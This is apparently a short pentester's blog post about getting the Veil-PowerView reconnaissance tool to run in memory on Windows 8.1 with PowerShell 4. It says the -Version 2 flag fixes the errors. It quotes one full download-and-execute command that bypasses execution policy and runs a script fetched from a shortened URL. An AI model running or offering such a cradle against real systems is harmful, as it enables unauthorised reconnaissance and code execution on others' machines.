I ran into a little problem when attempting to run Veil-Powerview on a Windows 8.1 box running Powershell version 4 that also included some issues with running shells remotely. I just wanted to share my findings. Not anything astounding but I hope I can save somebody some time. I wanted to run powerview in memory by pulling it down from the web as shown in the @harmj0y article here. The command is as follows
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mYPUO4‘); Invoke-NetView -Ping | Out-File -Encoding ascii netview.txt”
But powershell doesn’t seem to happy at all and vomits errors all over my screen. The error states that you need to add the -Version 2 option. Let’s have a go and see if it works:
So It seems that after that Powerview goes about it’s merry way and it does but this is just running it on a local machine in front of me. So nothing mind blowing here but I did a little research further to discover how to do this when running a remote session and found this Technet article. I’m going to continue looking into this and possibly script something up to assist with running post exploitation tools on clients running powershell 4.
So I reported the error to @harmj0y and he has added a warning to veil-powerview to make sure everybody knows to add -Version 2. it’s shown here:
I’m going to do more research to see if this argument can be forced in some way.